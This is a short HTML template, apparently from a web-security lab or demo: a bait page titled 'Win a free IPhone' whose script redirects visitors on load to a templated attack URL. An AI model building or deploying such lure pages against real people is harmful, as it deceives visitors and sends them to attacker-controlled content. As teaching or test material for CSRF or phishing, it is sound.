<!DOCTYPE html>
<html>
    <head>
        <title>Win a free IPhone</title>
        
    </head>
    <body>
        <h1>IPhone</h1>
        <script>
            location.href = "<%- attack_url %>";
        </script>
    </body>
</html>